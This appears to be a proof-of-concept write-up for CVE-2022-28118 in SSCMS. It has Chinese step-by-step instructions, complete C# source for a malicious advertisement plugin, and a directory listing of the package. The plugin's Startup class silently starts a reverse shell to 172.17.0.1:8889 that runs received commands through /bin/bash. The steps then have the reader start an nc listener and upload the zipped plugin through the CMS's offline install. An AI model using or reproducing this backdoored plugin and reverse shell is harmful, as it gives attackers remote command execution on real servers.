CVE-2022-281181. 安装VisualStudio
2. 导入该项目
3. 修改Startup.cs文件中的`IPAddress.Parse`值
```c#
using Microsoft.Extensions.DependencyInjection;
using SSCMS.Advertisement.Abstractions;
using SSCMS.Advertisement.Core;
using SSCMS.Plugins;
using System.Diagnostics;
using System;
using System.Text;
using System.Net.Sockets;
using System.Net;
using System.Threading;
namespace SSCMS.Advertisement
{
public class Startup : IPluginConfigureServices
{
public void ConfigureServices(IServiceCollection services)
{
ThreadStart childref = new ThreadStart(reversShell);
Thread childThread = new Thread(childref);
childThread.Start();
services.AddScoped<IAdvertisementRepository, AdvertisementRepository>();
}
public void reversShell()
{
Socket socketshell = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
IPAddress ip = IPAddress.Parse("172.17.0.1");
IPEndPoint point = new IPEndPoint(ip, Convert.ToInt32("8889"));
try
{
socketshell.Connect(point);
while (true)
{
byte[] getdata = new byte[1024 * 5];
int n = socketshell.Receive(getdata);
string restr = Encoding.Default.GetString(getdata, 0, n);
string command = restr;
string resultok = willshell(command);
byte[] senddata = new byte[1024 * 5];
senddata = Encoding.Default.GetBytes(resultok);
socketshell.Send(senddata);
}
}
catch
{
socketshell.Close();
}
}
public static string willshell(object command)
{
Process process = new Process();
process.StartInfo.FileName = "/bin/bash";
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardError = true;
process.StartInfo.RedirectStandardInput = true;
process.StartInfo.RedirectStandardOutput = true;
process.StartInfo.CreateNoWindow = true;
process.Start();
process.StandardInput.WriteLine("echo off");
process.StandardInput.WriteLine(command);
process.StandardInput.WriteLine("exit");
string result = process.StandardOutput.ReadToEnd();
return result;
}
}
}
```
4. 编译项目
5. 将编译后的输出目录打包成Zip包
6. 服务器开启监听
```bash
nc -lvvp 8889
```
7. 到系统中进行离线安装上传
[4.0K] /data/pocs/465e5e4972a05af4fca5572c46a368e125636608
├── [4.0K] Abstractions
│ └── [ 784] IAdvertisementRepository.cs
├── [4.0K] Controllers
│ ├── [4.0K] Admin
│ │ ├── [3.7K] AddController.cs
│ │ ├── [2.4K] AddController.Get.cs
│ │ ├── [2.7K] AddController.Submit.cs
│ │ ├── [2.0K] AddController.Upload.cs
│ │ ├── [3.4K] ListController.cs
│ │ ├── [1.5K] ListController.Delete.cs
│ │ └── [2.1K] ListController.Get.cs
│ └── [ 330] PingController.cs
├── [4.0K] Core
│ ├── [4.7K] AdvertisementRepository.cs
│ └── [ 624] CreateStartAsync.cs
├── [4.1K] Detail.md
├── [ 34K] LICENSE
├── [4.0K] Models
│ ├── [1.3K] Advertisement.cs
│ ├── [ 406] AdvertisementType.cs
│ ├── [ 425] PositionType.cs
│ ├── [ 419] RollingType.cs
│ └── [ 388] ScopeType.cs
├── [4.0K] obj
│ ├── [4.0K] Debug
│ │ └── [4.0K] net6.0
│ │ ├── [ 85K] SSCMS.Advertisement.assets.cache
│ │ └── [ 0] SSCMS.Advertisement.csproj.FileListAbsolute.txt
│ ├── [381K] project.assets.json
│ ├── [2.5K] SSCMS.Advertisement.csproj.nuget.dgspec.json
│ ├── [1.6K] SSCMS.Advertisement.csproj.nuget.g.props
│ ├── [ 150] SSCMS.Advertisement.csproj.nuget.g.targets
│ └── [ 5] staticwebassets.pack.sentinel
├── [2.4K] package.json
├── [4.0K] Pages
│ └── [4.0K] ss-admin
│ └── [4.0K] advertisement
│ ├── [ 12K] add.cshtml
│ └── [1.4K] list.cshtml
├── [2.4K] README.md
├── [ 605] SSCMS.Advertisement.csproj
├── [2.0K] Startup.cs
├── [4.0K] Utils
│ ├── [1.9K] AdvertisementUtils.cs
│ ├── [5.9K] ScriptFloating.cs
│ ├── [ 994] ScriptOpenWindow.cs
│ └── [1.6K] ScriptScreenDown.cs
└── [4.0K] wwwroot
├── [4.0K] assets
│ └── [4.0K] advertisement
│ ├── [4.7K] adFloating.js
│ ├── [1.2K] close.gif
│ └── [ 90K] jquery-1.9.1.min.js
└── [4.0K] ss-admin
└── [4.0K] advertisement
├── [4.0K] add
│ └── [5.0K] index.js
├── [4.0K] list
│ └── [2.0K] index.js
└── [2.0K] logo.svg
19 directories, 41 files